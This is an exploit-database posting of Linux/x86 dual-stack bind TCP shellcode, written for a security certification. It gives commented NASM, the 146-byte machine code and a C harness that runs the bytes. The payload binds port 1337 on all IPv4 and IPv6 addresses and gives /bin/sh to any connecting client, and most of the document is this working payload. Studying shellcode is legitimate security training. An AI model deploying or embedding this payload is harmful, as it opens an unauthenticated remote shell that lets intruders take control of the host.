
Linux/x86 Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode
Posted Aug 31, 2018
Authored by Kevin Kirsche

Linux/x86 dual network stack (IPv4 and IPv6) bind TCP shellcode.

tags | x86, tcp, shellcode
systems | linux
MD5 | 0dd1f19482e4deabce127fe130413c4a


/*
# Exploit Title: Linux x86 Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode
# Date: 2018-08-18
# Shellcode Author: Kevin Kirsche
# Shellcode Repository: https://github.com/kkirsche/SLAE/tree/master/assignment_1-bind_shell
# Tested on: Shell on Ubuntu 18.04 with gcc 7.3.0 / Connected from Kali 2018.2

# This shellcode will listen on port 1337 on all of the host's IPv4 and IPv6 addresses and give you /bin/sh

This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1134

Compilation instructions:
gcc -o shellcode shellcode.c -fno-stack-protector -z execstack

Commented NASM:
global _start

section .text

_start:
; socket
;; cleanup
xor ebx, ebx
;; arguments
push ebx ; #define IP_PROTO 0
push 0x1 ; #define SOCK_STREAM 1
push 0xa ; #define PF_INET6 10
;; function
mov ecx, esp ; pointer to args on the stack into ecx
push 0x66
pop eax ; socketcall 0x66 == 102
inc ebx ; #define SYS_SOCKET 1
;; call
int 0x80
;; returned data
xchg esi, eax ; sockfd eax -> esi

; setsockopt
;; cleanup
xor eax, eax
;; arguments
push eax ; NO = 0x0
mov edx, esp ; get a pointer to the null value
push 0x2 ; optlen = 2 (note: the NO value pushed above is a 4-byte dword)
push edx ; pointer to NO
push 0x1a ; #define IPV6_V6ONLY 26
push 0x29 ; #define IPPROTO_IPV6 41
;; function
mov ecx, esp ; pointer to args on the stack into ecx
mov al, 0x66 ; socketcall 0x66 == 102
mov bl, 0xe ; #define SYS_SETSOCKOPT 14
;; call
int 0x80

; bind ipv4
;; cleanup
xor edx, edx
;; v4lhost struct
push edx ; #define INADDR_ANY 0
push word 0x3905 ; port 1337 in big endian format
push 0x2 ; #define AF_INET 2
;; arguments
mov ecx, esp ; pointer to v4lhost struct arguments
push 0x10 ; sizeof(struct sockaddr_in) == 16
push ecx ; pointer v4lhost
push esi ; push sockfd onto stack
;; function
mov ecx, esp ; argument pointer into ecx
mov bl, 0x2 ; #define SYS_BIND 2
mov al, 0x66 ; socketcall 0x66 == 102
;; call
int 0x80

; bind ipv6
;; cleanup
xor eax, eax
;; v6lhost struct
push dword eax ; v6_host.sin6_addr
push dword eax
push dword eax
push dword eax
push dword eax
push word 0x3905 ; port 1337
push word 0x0a ; sin6_family = AF_INET6 (10)
;; arguments
mov ecx, esp ; pointer to struct into ecx
push 0x1c ; sizeof(struct sockaddr_in6) == 28, but only 24 bytes were pushed above: the trailing sin6_scope_id is read from the next dword already on the stack (the esi pushed for the IPv4 bind)
push ecx ; pointer to struct
push esi ; sockfd
;; function
mov ecx, esp ; arguments into register
mov bl, 0x2 ; #define SYS_BIND 2
mov al, 0x66 ; socketcall 0x66 == 102
;; call
int 0x80

; listen
;; arguments
push byte 0x2 ; backlog = 2
push esi ; sockfd
;; function
mov ecx, esp ; pointer to args into ecx
mov bl, 0x4 ; #define SYS_LISTEN 4
mov al, 0x66 ; socketcall 0x66 == 102
;; call
int 0x80

; accept
;; cleanup
xor ebx, ebx
;;arguments
push ebx ; push NULL
push ebx ; push NULL
push esi ; sockfd
;; function
mov ecx, esp ; pointer to args into ecx
mov bl, 0x5 ; #define SYS_ACCEPT 5
mov al, 0x66 ; socketcall 0x66 == 102
;; call
int 0x80
;; returned data
xchg ebx, eax ; ebx holds the new sockfd that we accepted

; dup file descriptor
;; setup counters
sub ecx, ecx ; zero out ecx
mov cl, 0x2 ; create a counter
;; loop
duploop:
mov al, 0x3f ; dup2 syscall (0x3f == 63): ebx = accepted sockfd, ecx = target fd; runs for ecx = 2, 1, 0
int 0x80 ; call SYS_DUP2
dec ecx ; decrement loop counter
jns duploop ; as long as SF is not set, keep looping

; execve
;; cleanup
xor edx, edx
;; command to run
push edx ; NULL string terminator
push 0x68732f2f ; hs//
push 0x6e69622f ; nib/
;; arguments
mov ebx, esp ; pointer to args into ebx
push edx ; null ARGV
push ebx ; command to run
;; function
mov ecx, esp
mov al, 0x0b ; execve systemcall
int 0x80
*/
#include <stdio.h>
#include <string.h>

/*
 * Machine code corresponding to the NASM listing in the header comment
 * above (146 bytes). It is stored in a writable global and executed
 * through a function-pointer cast in main(), so the mapping holding it
 * must be executable for the harness to run at all -- presumably what the
 * `-z execstack` build flag in the header is meant to arrange; confirm on
 * the target kernel.
 */
unsigned char code[] = "\x31\xdb\x53\x6a\x01\x6a\x0a\x89\xe1\x6a\x66\x58\x43"
"\xcd\x80\x96\x31\xc0\x50\x89\xe2\x6a\x02\x52\x6a\x1a\x6a\x29\x89\xe1\xb0"
"\x66\xb3\x0e\xcd\x80\x31\xd2\x52\x66\x68\x05\x39\x6a\x02\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x50\x50\x50\x50\x66"
"\x68\x05\x39\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\xb3\x02\xb0\x66"
"\xcd\x80\x6a\x02\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56"
"\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x93\x29\xc9\xb1\x02\xb0\x3f\xcd\x80\x49"
"\x79\xf9\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
"\x53\x89\xe1\xb0\x0b\xcd\x80";


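/*
 * Test harness: print the length of the byte array, then jump into it.
 *
 * Returns 0 only if the payload hands control back, which the listing
 * above is not written to do.
 */
int main(void) {
	/* strlen() returns size_t, so %zu (not %d) is the matching conversion. */
	printf("Shellcode Length: %zu\n", strlen(code));

	/* Pollute the registers immediately before the jump. Doing this before
	 * printf()/strlen() -- as the original did -- is lost, because those
	 * calls overwrite the caller-saved eax/ecx/edx. The clobber list tells
	 * the compiler these registers no longer hold anything it cached; it
	 * may still reload one of them to hold the call target. */
	asm volatile("mov $0x78975432, %%eax\n\t"
	             "mov $0x17645589, %%ecx\n\t"
	             "mov $0x23149875, %%edx\n\t"
	             : : : "eax", "ecx", "edx");

	/* Execute the bytes in place; requires the mapping of code[] to be executable. */
	int (*ret)(void) = (int (*)(void))code;
	ret();
	return 0;
}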


